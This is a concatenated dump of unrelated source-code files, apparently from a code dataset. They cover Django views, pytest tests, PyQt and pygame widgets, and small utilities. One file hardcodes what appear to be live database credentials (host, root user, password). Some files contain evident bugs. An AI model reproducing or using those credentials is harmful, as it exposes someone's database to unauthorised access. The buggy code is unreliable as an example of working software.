print data.splitlines()\n #>>> rp.tokens\n #>>> dir(rp.tokens)\n #>>> rp.tokens.asDict()\n #>>> rp.tokens.items()\n \"\"\"\n self.tokens = grammar.parseString(rtfData)\n self._loadContent()\n \n def getCodePage(self):\n return self.tokens['codePage']\n\n codePage = property(getCodePage) \n\n def _processControlName(self, cntName):\n \n if (cntName == 'cell'):\n return '\\t'\n elif (cntName == 'par'):\n return '\\n'\n \n return ''\n \n def _loadContent(self):\n \"\"\" very simple RTF parser \"\"\"\n if (not self.tokens): return None\n if (not self.tokens['rtfContent']): return None\n \n if (self.rtfContent):\n return\n \n stack = ['{']\n content = ''\n controlName = ''\n \n for ch in self.tokens['rtfContent']:\n if len (stack) == 0: break\n stackHead = stack[-1]\n \n if (ch == LEFT_BRACKET or ch == RIGHT_BRACKET):\n if (stackHead == BACKSLASH):\n if len (controlName) > 0:\n content += self._processControlName (controlName)\n controlName = ''\n \n stack.pop()\n stack.append (ch)\n else: \n content += ch\n stack.pop ()\n elif (ch == RIGHT_BRACKET): \n stack.pop () # eat group\n else:\n stack.append (ch)\n \n elif (ch == BACKSLASH):\n if (stackHead == BACKSLASH):\n if len (controlName) > 0:\n content += self._processControlName (controlName)\n controlName = ''\n else:\n content += BACKSLASH\n stack.pop ()\n else: \n stack.append (ch)\n else:\n if (stackHead == BACKSLASH):\n if (ord(ch) in LETTERS) or (ch == SPACE) or (ch == HYPHEN) or (ord(ch) in DIGITS):\n controlName += ch\n if (ch == SPACE):\n content += self._processControlName (controlName)\n controlName = ''\n stack.pop ()\n else:\n if len (controlName) > 0:\n content += self._processControlName (controlName)\n controlName = ''\n else:\n content += ch #XXX: control symbol \n \n stack.pop () # delimiter\n \n else: \n content += ch\n \n self.rtfContent = content\n\n\ndef _test():\n pass\n\nif __name__ == '__main__':\n _test()\n\n","sub_path":"import/rtf_parser.py","file_name":"rtf_parser.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"124964635","text":"import math\nfrom unittest.mock import call\n\nimport pytest\n\nfrom ex02.robot import Robot, MotionController, Wheel, EnergySupplier\nfrom ex02.motion import Translation, Rotation\nfrom ex02.geometry import Point\n\n\ndef get_values_from_call_list(call_list):\n return list(a[0][0] for a in call_list)\n\n\nclass TestMotionController:\n\n @pytest.fixture()\n def init_controller(self, mocker):\n robot = mocker.Mock(spec=Robot)\n right_wheel = mocker.Mock(spec=Wheel)\n left_wheel = mocker.Mock(spec=Wheel)\n energy_supplier = mocker.Mock(spec=EnergySupplier)\n configuration = {}\n ctrl = MotionController(right_wheel=right_wheel,\n left_wheel=left_wheel,\n configuration=configuration)\n\n return ctrl, robot, right_wheel, left_wheel, configuration, energy_supplier\n\n def test_default_values_are_well_known(self, init_controller):\n \"\"\"Assertions about implicit values\"\"\"\n ctrl, *_ = init_controller\n\n assert MotionController.DEFAULT_WHEEL_AXIS_LENGTH == 1\n assert MotionController.CONSUMPTION_PER_LENGTH_UNIT == 1\n assert MotionController.DEFAULT_SPEED == 0.1\n assert MotionController.CONSUMPTION_PER_LENGTH_UNIT == 1\n assert MotionController.DEFAULT_TIME_STEP == 0.1\n\n assert ctrl.speed == MotionController.DEFAULT_SPEED\n assert ctrl.consumption_per_length_unit == MotionController.CONSUMPTION_PER_LENGTH_UNIT\n assert ctrl.time_step == MotionController.DEFAULT_TIME_STEP\n\n def 
test_translation(self, init_controller):\n # --given--\n ctrl, robot, right_wheel, left_wheel, _, energy_supplier = init_controller\n tr = Translation(Point(0, 0), Point(10, 0))\n assert tr.length == 10\n\n expected_nb_call = 1000\n len_step_per_call = 0.01\n\n assert expected_nb_call * len_step_per_call == tr.length\n\n # --when--\n ctrl.run_translation(tr, energy_supplier)\n\n # --then--\n assert right_wheel.run.call_count == expected_nb_call\n assert left_wheel.run.call_count == expected_nb_call\n\n right_wheel.run.assert_called_with(len_step_per_call)\n left_wheel.run.assert_called_with(len_step_per_call)\n\n def test_rotation_on_the_spot(self, init_controller):\n # --given--\n ctrl, robot, right_wheel, left_wheel, _, energy_supplier = init_controller\n center = Point(1, 0)\n rot = Rotation(start=center,\n end=center,\n start_vector=Point(0, 1),\n end_vector=Point(-1, 0))\n angle = math.pi / 2\n radius = 0\n expected_nb_of_wheel_run_call = 78\n \n self._do_assertions_about_params(rot, center, angle, radius)\n\n\n # --when--\n ctrl.run_rotation(rot, energy_supplier)\n\n # --then--\n right_args = self.extract_values(right_wheel, 'run')\n left_args = self.extract_values(left_wheel, 'run')\n supplier_args = self.extract_values(energy_supplier, 'consume')\n\n self._do_assertions_nb_of_call(right_args,\n left_args,\n supplier_args,\n expected_nb_of_wheel_run_call)\n\n self._do_assertions_nb_of_distinct_values(right_args,\n left_args,\n supplier_args,\n 1)\n\n\n # inversed value\n assert right_args[0] == -left_args[0]\n assert right_args[0] == (rot.arc.angle/2) / expected_nb_of_wheel_run_call\n\n @pytest.mark.parametrize(\"params\", [\n {'rotation': Rotation(start=Point(10, 0),\n end=Point(0, 10),\n start_vector=Point(0, 1),\n end_vector=Point(-1, 0)),\n 'center': Point(0, 0),\n 'angle': math.pi / 2,\n 'radius': 10,\n 'expected_nb_of_wheel_run_call': 1649\n },\n {'rotation': Rotation(start=Point(0, 5),\n end=Point(0, 0),\n start_vector=Point(1, -1),\n end_vector=Point(-1, -1)),\n 'center': Point(-2.5, 2.5),\n 'angle': -3*math.pi / 2,\n 'radius': 3.5355339059327373,\n 'expected_nb_of_wheel_run_call': 1901\n }\n\n ])\n def test_rotation_with_center(self, params, init_controller):\n # --given--\n ctrl, robot, right_wheel, left_wheel, _, energy_supplier = init_controller\n\n center = params['center']\n rot = params['rotation']\n angle = params['angle']\n radius = params['radius']\n expected_nb_of_wheel_run_call = params['expected_nb_of_wheel_run_call']\n\n self._do_assertions_about_params(rot, center, angle, radius)\n\n # --when--\n ctrl.run_rotation(rot, energy_supplier)\n\n # --then--\n right_args = self.extract_values(right_wheel, 'run')\n left_args = self.extract_values(left_wheel, 'run')\n supplier_args = self.extract_values(energy_supplier, 'consume')\n\n # same nb of calls\n self._do_assertions_nb_of_call(right_args,\n left_args,\n supplier_args,\n expected_nb_of_wheel_run_call)\n\n self._do_assertions_nb_of_distinct_values(right_args,\n left_args,\n supplier_args,\n 1)\n\n self._do_assertions_lenght_values_for_both_wheels(rot,\n right_args,\n left_args,\n expected_nb_of_wheel_run_call,\n angle)\n\n def _do_assertions_about_params(self, rot, center, angle, radius):\n assert math.isclose(rot.arc.angle, angle)\n assert rot.arc.center == center\n assert rot.arc.radius == radius\n\n def _do_assertions_nb_of_call(self, right_args, left_args, supplier_args,\n expected_nb_of_wheel_run_call):\n assert len(right_args) == len(left_args)\n # energy supplier call two time more\n assert 
len(supplier_args) == len(right_args)\n assert len(right_args) == expected_nb_of_wheel_run_call\n\n def _do_assertions_nb_of_distinct_values(self, right_args, left_args, supplier_args, nb_arg):\n # same nb of diff. value\n assert len(set(right_args)) == len(set(left_args)) == nb_arg\n assert len(set(supplier_args)) == nb_arg\n\n def _do_assertions_lenght_values_for_both_wheels(self, rotation,\n right_args,\n left_args,\n expected_nb_of_wheel_run_call,\n angle):\n \"\"\"Does assertions about length values for both wheels\"\"\"\n half_axis_len = MotionController.DEFAULT_WHEEL_AXIS_LENGTH / 2\n\n big_radius = (rotation.arc.radius + half_axis_len)\n short_radius = (rotation.arc.radius - half_axis_len)\n\n ratio = big_radius / short_radius\n\n right_value = right_args[0]\n left_value = left_args[0]\n\n max_value = max(right_value, left_value)\n min_value = min(right_value, left_value)\n\n ratio_from_step = max_value / min_value\n assert ratio == pytest.approx(ratio_from_step), \"ratio assertion\"\n\n expected_max_value = math.fabs(angle / expected_nb_of_wheel_run_call * (rotation.arc.radius + half_axis_len))\n\n assert max_value == pytest.approx(expected_max_value), \"max value for rotation\"\n\n\n def extract_values(self, mock, param):\n \"\"\"Extracts values from mock's call_args_list\"\"\"\n args = getattr(mock, param).call_args_list\n return get_values_from_call_list(args)\n","sub_path":"test/test_motion_controller_exercise_2_3.py","file_name":"test_motion_controller_exercise_2_3.py","file_ext":"py","file_size_in_byte":8158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"139934305","text":"import pygame\nfrom pygame.locals import *\nimport sys\nimport numpy as np\nfrom drawings import *\nimport time\nfrom functions import *\n\n\nclass Hierarchic():\n def __init__(self, points, groups):\n self.points = generatePoints(points, groups)\n self.color_of_point = np.zeros(self.points.shape[0])\n self.dist = np.zeros((self.points.shape[0], self.points.shape[0]))\n self.numbers = str(range(0, self.points.shape[0], 1))\n\n def calculateDistance(self):\n for x in range(self.points.shape[0]):\n for y in range(self.points.shape[0]):\n if x == y:\n self.dist[x][y] = np.nan\n else:\n self.dist[x][y] = dist(self.points[x], self.points[y])\n\n def hier(self, distance, surface):\n self.calculateDistance()\n while True:\n if self.dist.shape[0] <= 1:\n break\n result = np.where(self.dist == np.nanmin(self.dist))\n if self.dist[result[0][0]][result[0][1]] >= distance:\n return\n try:\n self.numbers[result[0][0]] += self.numbers[result[0][1]]\n self.numbers.pop(result[0][1])\n except:\n print(type(result[0][0]), type(self.numbers))\n for x in range(self.points.shape[0]):\n if self.dist[result[0][0]][x] == np.nan or self.dist[result[0][1]][x] == np.nan:\n self.dist[result[0][0]][x] = np.nan\n elif self.dist[result[0][0]][x] > self.dist[result[0][1]][x]:\n self.dist[result[0][0]][x] = self.dist[result[0][1]][x]\n self.dist = np.delete(self.dist, result[0][1])\n\n\ndef hierarhichWindow(surface):\n value1, value2, value3 = 0, 0, 0\n flag1, flag2, flag3 = False, False, False\n rect1, rect2, rect3 = (100, 50, 200, 10), (100, 150, 200, 10), (100, 250, 200, 10)\n font = pygame.font.SysFont(\"comicsansms\", 18)\n drawSurface(surface)\n drawScaling(surface, value1, 100, rect1, font, \"Points:\")\n drawScaling(surface, value2, 10, rect2, font, \"Groups:\")\n drawScaling(surface, value3, 9, rect3, font, \"Distance:\")\n drawButton(surface, (100, 300, 200, 50), 
getColor(9), font, \"Simulate\")\n pygame.display.update()\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit(0)\n if event.type == pygame.MOUSEMOTION:\n if event.buttons[0] == 1:\n pos = pygame.mouse.get_pos()\n if inBoundriesOfRect(rect1, pos) or inBoundriesOfCircle(\n (rect1[0] + 2 * value1, rect1[1] + (rect1[3] / 2)), 20, pos) or flag1:\n if pos[0] >= 300:\n value1 = 100\n elif pos[0] <= 100:\n value1 = 0\n else:\n value1 = int((pos[0] - 100) / 2)\n flag1 = True\n elif inBoundriesOfRect(rect2, pos) or inBoundriesOfCircle(\n (rect2[0] + 20 * value2, rect2[1] + (rect2[3] / 2)), 20, pos) or flag2:\n if pos[0] >= 300:\n value2 = 10\n elif pos[0] <= 100:\n value2 = 0\n else:\n value2 = int((pos[0] - 100) / 20)\n flag2 = True\n elif inBoundriesOfRect(rect3, pos) or inBoundriesOfCircle(\n (rect3[0] + 4 * value3, rect3[1] + (rect3[3] / 2)), 20, pos) or flag3:\n if pos[0] >= 300:\n value3 = 50\n elif pos[0] <= 100:\n value3 = 0\n else:\n value3 = int((pos[0] - 100) / 4)\n flag3 = True\n drawSurface(surface)\n drawScaling(surface, value1, 100, (100, 50, 200, 10), font, \"Points:\")\n drawScaling(surface, value2, 10, (100, 150, 200, 10), font, \"Groups:\")\n drawScaling(surface, value3, 50, (100, 250, 200, 10), font, \"Distance:\")\n drawButton(surface, (100, 300, 200, 50), getColor(9), font, \"Simulate\")\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n flag1, flag2, flag3 = False, False, False\n pos = pygame.mouse.get_pos()\n if pos[0] >= 100 and pos[0] <= 300 and pos[1] >= 300 and pos[1] <= 350:\n if value1 != 0 and value2 != 0 and value3 != 0:\n h = Hierarchic(value1, value2)\n h.hier(value3, surface)\n","sub_path":"Hierarchic.py","file_name":"Hierarchic.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"627195851","text":"#!/usr/bin/env python\n\nfrom PyQt5.QtGui import QImage, QPainter, QPen\nfrom PyQt5.QtCore import pyqtSignal, QPointF, Qt, QPoint\nfrom PyQt5.QtWidgets import QWidget, QGridLayout\n\nimport os\nimport rospy\nimport rospkg\n\nclass TeleopWidget(QWidget):\n stop_sig = pyqtSignal()\n\n def __init__(self, win_parent, parent_function_name, side):\n super(TeleopWidget, self).__init__()\n self.parent_function = getattr(win_parent, parent_function_name)\n self.line = QPointF(0, 0)\n self.qimage = QImage()\n self.qimage.load(os.path.join(rospkg.RosPack().get_path('rqt_drone_teleop'), 'resource', 'ball.png'))\n self.stop_sig.connect(self.stop)\n self.init_ui(side)\n\n def init_ui(self, side):\n layout = QGridLayout()\n self.setLayout(layout)\n self.setAutoFillBackground(True)\n p = self.palette()\n p.setColor(self.backgroundRole(), Qt.black)\n self.setPalette(p)\n self.resize(side, side)\n self.setMinimumSize(side, side)\n\n def stop(self):\n self.line = QPointF(0, 0)\n self.repaint()\n\n def mouseMoveEvent(self, e):\n if e.buttons() == Qt.LeftButton:\n x = e.x()-self.width()/2\n y = e.y()-self.height()/2\n self.line = QPointF(x, y)\n self.repaint()\n\n def paintEvent(self, e):\n _width = self.width()\n _height = self.height()\n width = 2\n painter = QPainter(self)\n pen = QPen(Qt.blue, width)\n painter.setPen(pen)\n #Centro del widget\n painter.translate(QPoint(_width/2, _height/2))\n #eje\n painter.drawLine(QPointF(-_width, 0), QPointF(_width, 0))\n painter.drawLine(QPointF(0, -_height), QPointF(0, _height))\n\n #con el raton\n pen = QPen(Qt.red, width)\n painter.setPen(pen)\n\n #Comprobamos que el raton este dentro 
de los limites\n if abs(self.line.x()*2) >= self.size().width():\n if self.line.x() >= 0:\n self.line.setX(self.size().width()/2)\n elif self.line.x() < 0:\n self.line.setX((-self.size().width()/2)+1)\n\n if abs(self.line.y()*2) >= self.size().height():\n if self.line.y() >= 0:\n self.line.setY(self.size().height()/2)\n elif self.line.y() < 0:\n self.line.setY((-self.size().height()/2)+1)\n\n painter.drawLine(QPointF(self.line.x(), -_height),\n QPointF(self.line.x(), _height))\n\n painter.drawLine(QPointF(-_width, self.line.y()),\n QPointF(_width, self.line.y()))\n\n #print \"x: %f y: %f\" % (self.line.x(), self.line.y())\n\n v_normalized = (1.0/(self.size().height()/2)) * self.line.y()\n v_normalized = float(\"{0:.2f}\".format(v_normalized))\n w_normalized = (1.0/(self.size().width()/2)) * self.line.x()\n w_normalized = float(\"{0:.2f}\".format(w_normalized))\n\n #print \"v: %f w: %f\" % (v_normalized,w_normalized)\n self.parent_function(w_normalized, v_normalized)\n painter.drawImage(self.line.x()-self.qimage.width()/2,\n self.line.y()-self.qimage.height()/2, self.qimage)\n","sub_path":"rqt_drone_teleop/src/rqt_vel_teleop/teleopWidget.py","file_name":"teleopWidget.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"390763476","text":"# This file was copied from a tutorial with O'reaily books tutorial\r\n# and has completly been used for practice and experimentation\r\n# code was written by Jessica McKellar\r\n\r\nWORD_LIST = \"sowpods.txt\"\r\nwordlist = open(WORD_LIST).readlines()\r\n# Get rid of newlines\r\nwordlist = [word.lower().strip() for word in wordlist]\r\n\r\nscores = {\"a\": 1, \"c\": 3, \"b\": 3, \"e\": 1, \"d\": 2, \"g\": 2,\r\n \"f\": 4, \"i\": 1, \"h\": 4, \"k\": 5, \"j\": 8, \"m\": 3,\r\n \"l\": 1, \"o\": 1, \"n\": 1, \"q\": 10, \"p\": 3, \"s\": 1,\r\n \"r\": 1, \"u\": 1, \"t\": 1, \"w\": 4, \"v\": 4, \"y\": 4,\r\n \"x\": 8, \"z\": 10}\r\n","sub_path":"Python/scrabble.py","file_name":"scrabble.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"602440324","text":"import os\nfrom django.shortcuts import render, get_object_or_404, Http404, redirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required \nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom django.db.models import F,Q\nfrom django.utils.timezone import now\nfrom django.contrib.auth.forms import PasswordChangeForm \nfrom django.contrib.auth import authenticate, login, get_user_model, logout \n#COSTUM IMPORTS \nfrom Forum.forms import EditProfileForm\nfrom .models import Friend, UserProfile,FriendRequest\nfrom .forms import loginForm, registerForm, UserProfileForm\nfrom blog.models import Post,Notifications\n\ndef create_notify(sender,post,action_type,reciever):\n print('create_notify')\n # try :\n print('friend found')\n notif = Notifications.add_nofi(sender,post,action_type,reciever)\n print('reciver added')\n print(action_type)\n print('done')\n # except :\n # print('Notification not created') \n # print(action_type)\ndef notify_context(user,context):\n print('notify_context')\n #querying Notifications\n try :\n print(user)\n print('check 0')\n noti = Notifications.objects.filter(receivers=user)\n noti_no_qs = noti.filter(read_at=None)\n print(noti_no_qs.count())\n context['Notifications'] = noti\n context[\"notification_no\"] = noti_no_qs.count()\n context[\"user\"] 
= user\n print('check 1')\n print(\"check 2\")\n except :\n print('except :')\n print('noti not found')\ndef friend_requests_context(user,context):\n print('friend_requests_context')\n #querying FriendRequest\n try :\n print(user)\n print('check 0')\n friend_request = FriendRequest.objects.filter(Q(receiver=user)&Q(delete=False))\n print('check 0')\n context['friend_request'] = friend_request\n req_no = friend_request.count()\n context[\"req_no\"] = req_no\n print(req_no)\n print('check 0') \n except :\n print('except :')\n print('req not found') \ndef people(request):\n # quering user\n try :\n user = UserProfile.objects.get(user=request.user)\n except UserProfile.DoesNotExist :\n raise Http404(\"UserProfile.DoesNotExist\")\n except :\n return redirect('home')\n try :\n people = UserProfile.objects.all()\n except UserProfile.DoesNotExist :\n raise Http404(\"UserProfile.DoesNotExist\")\n except :\n raise Http404(\"except :\")\n context = {\n \"people\":people,\n }\n # querying notifications\n notify_context(user,context)\n friend_requests_context(user,context)\n return render(request, \"people_page.html\",context)\ndef follow(request, operation, pk):\n current_user = UserProfile.objects.get(user=request.user)\n to_be_followed = UserProfile.objects.get(pk=pk)\n if operation=='follow':\n Friend.follow(current_user,to_be_followed )\n print(\"follow list updated\")\n if operation=='unfollow':\n Friend.un_follow(current_user, to_be_followed)\n return redirect(\"accounts:users_profile\",pk=pk)\ndef friend_request(request,pk):\n current_user = UserProfile.objects.get(user=request.user)\n new_friend = UserProfile.objects.get(pk=pk)\n try :\n friend_request_qs,created = FriendRequest.objects.get_or_create(\n sender=current_user,\n receiver=new_friend,\n requested=True,\n delete = False,\n read_at = None,\n accepted= False\n )\n print(' friend_request sent')\n except :\n print('exception :(')\n return redirect(\"accounts:users_profile\",pk=pk)\ndef accept_request(request,pk):\n print(\"accept\")\n current_user = UserProfile.objects.get(user=request.user)\n new_friend = UserProfile.objects.get(pk=pk)\n try :\n friend_request_qs,created = FriendRequest.objects.get_or_create(sender=new_friend,receiver=current_user,requested=True)\n friend_request_qs.accepted = True\n friend_request_qs.delete = True\n friend_request_qs.save()\n print(\"accept check 1\")\n try :\n qs=FriendRequest.objects.get(Q(sender=new_friend)&Q(receiver=current_user))\n print(\"accept check 2\")\n bool = True\n except FriendRequest.DoesNotExist :\n bool = null\n except :\n print(\"exception\")\n bool = null\n print(\"accept check 3\")\n print(bool)\n if (bool == True) and (qs.accepted == True) :\n print(\"accept check 4\")\n Friend.add_friend(current_user, new_friend)\n qs.read_at = now()\n qs.save()\n qs.delete()\n print('qs.delete()')\n qs.save()\n print(qs.read_at)\n print(\"Friend list updated\")\n except :\n print('exception :(')\n return redirect(\"accounts:users_profile\",pk=pk)\ndef ignore_request(request,pk):\n print('ignore :')\n current_user = UserProfile.objects.get(user=request.user)\n new_friend = UserProfile.objects.get(pk=pk)\n # try :\n friend_request_qs,created = FriendRequest.objects.get_or_create(sender=current_user,receiver=new_friend,requested=True)\n print('check 1')\n friend_request_qs.read_at = now()\n print('check 2')\n print(\"Friend list updated\")\n friend_request_qs.accepted = False\n print('check 3')\n friend_request_qs.delete = True\n print('check 4')\n friend_request_qs.save()\n print('check 5')\n 
friend_request_qs.delete()\n print('check 6')\n friend_request_qs.save()\n print('check 7')\n # try :\n # qs=FriendRequest.objects.get(Q(sender=current_user)&Q(receiver=new_friend))\n # bool = True\n # except FriendRequest.DoesNotExist :\n # bool = False\n # except :\n # print(\"exception\")\n # if (bool == True):\n # qs.read_at = now()\n # print(\"Friend list updated\")\n # except :\n # print('exception :(')\n print('end of ignore')\n return redirect(\"accounts:users_profile\",pk=pk)\ndef remove_friend(request,pk):\n current_user = UserProfile.objects.get(user=request.user)\n new_friend = UserProfile.objects.get(pk=pk)\n Friend.remove_friend(current_user, new_friend)\n return redirect(\"accounts:users_profile\",pk=pk)\ndef Friend_request_view(request):\n try :\n active_user = UserProfile.objects.get(user=request.user)\n except :\n return redirect('home')\n context = {\n 'initilze' : 'initilze'\n }\n \n # try :\n notify_context(active_user,context)\n friend_requests_context(active_user,context)\n # except :\n # raise Http404(\"Notifications page eror\")\n return render(request,'friend_requests.html',context)\n\ndef profile_page(request):\n if request.user :\n print(\"checked\")\n context = {\n \"title\" : \"Profile\",\n \"description\" : \"Welcome to the Profile page\",\n }\n try :\n user = UserProfile.objects.get(user=request.user)\n avatar =user.avatar.url\n context[\"avatar\"] = avatar\n context['username'] = user.__str__\n context['user'] = user\n context['edit'] = 'edit'\n except :\n return redirect('home')\n print(\"checked\")\n # if user.is_authenticated :\n if user:\n try:\n new_qs = Friend.objects.get(current_user=user)\n friend_list = new_qs.friend_list.all()\n context[\"friend_list\"] = friend_list\n except Friend.DoesNotExist :\n print(\"Friend.DoesNotExist\")\n except :\n print(\"Friend.DoesNotExist\")\n try:\n posts = Post.objects.all().filter(auther=user).order_by('-time')\n context[\"posts\"] = posts\n except Post.DoesNotExist :\n print(\"Posts.DoesNotExist\")\n #querying notifications\n notify_context(user,context)\n friend_requests_context(user,context)\n return render(request, \"Profile.html\", context)\n\ndef users_profile_page(request, pk):\n context = {\n \"title\" : \"Profile\",\n \"description\" : \"Welcome to the Profile page\",\n \"pk\" : pk\n }\n active_user = UserProfile.objects.get(user=request.user)\n try :\n user = UserProfile.objects.get(pk=pk)\n print(user)\n avatar =user.avatar.url\n print(\"found the pic\")\n context[\"avatar\"] = avatar\n context['username'] = user.__str__\n context['user'] = user\n except :\n raise Http404(\"user not found\")\n if user==UserProfile.objects.get(user=request.user):\n return redirect(\"accounts:profile\")\n else :\n\n try :\n new_qs = Friend.objects.get(current_user=user)\n friend_list = new_qs.friend_list.all()\n context[\"friend_list\"] = friend_list\n except Friend.DoesNotExist :\n new_qs = None\n print('Friend.DoesNotExist')\n if new_qs is not None : \n try :\n # friendship_state_query = Friend.friend_list.through.objects.get(userprofile=user)\n # friendship_state_query = new_qs.friend_list.through.objects.get(userprofile=active_user)\n friendship_state_query = Friend.objects.get(Q(current_user=active_user)&Q(friend_list=user))\n print('friendship_state_query found')\n friendship_state = \"remove\"\n context['remove'] = friendship_state\n except Friend.DoesNotExist :\n friendship_state = \"add\"\n context['add'] = friendship_state\n except :\n friendship_state = \"add\"\n context['add'] = friendship_state\n try :\n 
following_state_query = Friend.objects.get(Q(current_user=active_user)&Q(following=user))\n # following_state_query = new_qs.following.through.objects.get(userprofile=active_user)\n print('following_state_query found')\n follow_state = \"unfollow\"\n context['unfollow'] = follow_state\n except Friend.DoesNotExist :\n follow_state = \"follow\"\n context['follow'] = follow_state\n except :\n follow_state = \"follow\"\n context['follow'] = follow_state\n else:\n follow_state = \"follow\"\n context['follow'] = follow_state\n friendship_state = \"add\"\n context['add'] = friendship_state\n try :\n posts = Post.objects.all().filter(auther=user).order_by('-time')\n context[\"posts\"] = posts\n except Post.DoesNotExist :\n print('Post.DoesNotExist')\n notify_context(active_user,context)\n friend_requests_context(active_user,context)\n return render(request, \"Profile.html\", context)\n\ndef search_page(request):\n context = {\n \"title\" : \"Serach Page\",\n \"description\" : \"Welcome to the Search page\"\n }\n return render(request, \"home_page.html\", context)\n\ndef login_page(request):\n form = loginForm(request.POST or None)\n if form.is_valid():\n print(form.cleaned_data)\n username = form.cleaned_data.get(\"username\")\n password = form.cleaned_data.get(\"password\")\n user = authenticate(request ,username=username,password=password)\n if user is not None:\n login(request, user)\n return redirect(\"/\")\n else :\n print(\"error\")\n context = {\n \"form\" : form ,\n # \"url\" : request.url \n \n }\n return render(request, \"auth/login_page.html\",context)\ndef logout_page(request):\n logout(request)\n return redirect(reverse('accounts:login'))\nUser = get_user_model()\n\ndef register_page(request):\n # form = registerForm(request.POST or None)\n form = UserProfileForm(request.POST or None, request.FILES or None)\n context = {\n \"form\" : form\n }\n if form.is_valid():\n print('check')\n instance = form.save(commit=False)\n print(form.cleaned_data)\n username = form.cleaned_data.get(\"username\")\n password = form.cleaned_data.get(\"password\")\n email = form.cleaned_data.get(\"email\")\n new_user = User.objects.create_user(username, email, password)\n instance.user = new_user\n instance.save()\n print(new_user)\n return redirect(\"/\")\n else :\n form = UserProfileForm()\n return render(request, \"auth/register_page.html\", context)\n@login_required(login_url=\"/login\")\ndef edit_profile(request):\n user=UserProfile.objects.get(user=request.user)\n context = {\n 'init' : 'init'\n }\n if request.method == 'POST' :\n form = EditProfileForm(request.POST,instance=user.user)\n if form.is_valid() :\n form.save()\n return redirect('accounts:profile')\n else :\n form = EditProfileForm(instance=user.user)\n context['form'] = form\n return render(request,'EditProfilePage.html',context)\n@login_required(login_url=\"/login\")\ndef change_password(request):\n user=UserProfile.objects.get(user=request.user)\n context = {\n 'init' : 'init'\n }\n if request.method == 'POST' :\n form = PasswordChangeForm(request.POST,user=user.user)\n if form.is_valid() :\n form.save()\n return redirect('accounts:profile')\n else :\n form = PasswordChangeForm(user= user.user)\n context['form'] = form\n return render(request,'change_password.html',context)\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"183423421","text":"import pymysql.cursors\nimport json\nclass 
OperationMysql:\n    def __init__(self):\n        self.conn = pymysql.connect(\n            host=\"rm-2ze67p557wd9p0m70.mysql.rds.aliyuncs.com\",\n            port=3306,\n            user='root',\n            password='arNV3CN7gTwMGt5nMm',\n            database='dev_1911edu',\n            charset = 'utf8',\n            cursorclass = pymysql.cursors.DictCursor\n        )\n        self.cur = self.conn.cursor()\n    def search_one(self):\n        sql=\"SELECT id FROM `user` WHERE user_name = 13681319134\"\n        self.cur.execute(sql)\n        result = self.cur.fetchone()\n        result = json.dumps(result)\n        ret = json.loads(result)\n        return ret['id']\n\nif __name__ == '__main__':\n    ret = OperationMysql().search_one()\n    print(ret)\n","sub_path":"util/connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"3840839","text":"def main():\r\n    import sys\r\n    num = int(sys.stdin.readline())\r\n    num1=int(sys.stdin.readline())\r\n    num2=int(sys.stdin.readline())\r\n    # A triangle is possible only if each side is shorter than the sum of the other two\r\n    if (num + num1 > num2 and num + num2 > num1 and num1 + num2 > num):\r\n        if num == num1 == num2:\r\n            print(\"Equilatero\")\r\n        elif num == num1 or num == num2 or num1 == num2:\r\n            print(\"Isosceles\")\r\n        elif num > num1 and num > num2 :\r\n            print(\"Escaleno,\",\"Lado mas largo es\",num)\r\n        elif num1 > num and num1 > num2:\r\n            print(\"Escaleno,\",\"Lado mas largo es\",num1)\r\n        else:\r\n            print(\"Escaleno,\",\"Lado mas largo es\",num2)\r\n    else:\r\n        print (\"Triangulo Imposible\")\r\nmain()\r\n","sub_path":"AYED/Programas/a5.py","file_name":"a5.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"381249169","text":"from pydantic import UUID4, BaseModel, EmailStr\n\n\nclass RegistrationUserEventModel(BaseModel):\n    \"\"\"Data model for a user registration event.\"\"\"\n\n    user_id: UUID4\n    firstname: str\n    email: EmailStr\n\n    class Config:\n        schema_extra = {\n            \"example\": {\n                \"user_id\": \"2831e77b-463d-4678-b261-cb52684db28a\",\n                \"firstname\": \"Bob\",\n                \"email\": \"Bob@yandex.ru\",\n            }\n        }\n","sub_path":"eventsAPI/models/registration_user_event.py","file_name":"registration_user_event.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"386932165","text":"from datetime import datetime\nfrom django.db import models\n\n\nclass Weather:\n\n    class Meta:\n        fields = ['city', 'temperature', 'description', 'icon']\n\n    def __init__(self):\n        self.city: str\n        self.temperature: float\n        self.description: str\n        self.icon: str\n\n\n","sub_path":"WeatherApp/weather/WeatherApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"337828828","text":"### LDA Topic Modeling - Sklearn Implementation\nimport os, io\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport json, csv\nimport tempfile\nfrom collections import OrderedDict\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation\nfrom sklearn.feature_extraction import text\n\ncsv_lda_topics = {}\njson_lda_topics = []\ncorpus = []\na = []\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-f\", \"--file\", type=str, default=\"-\", help=\"did not specify 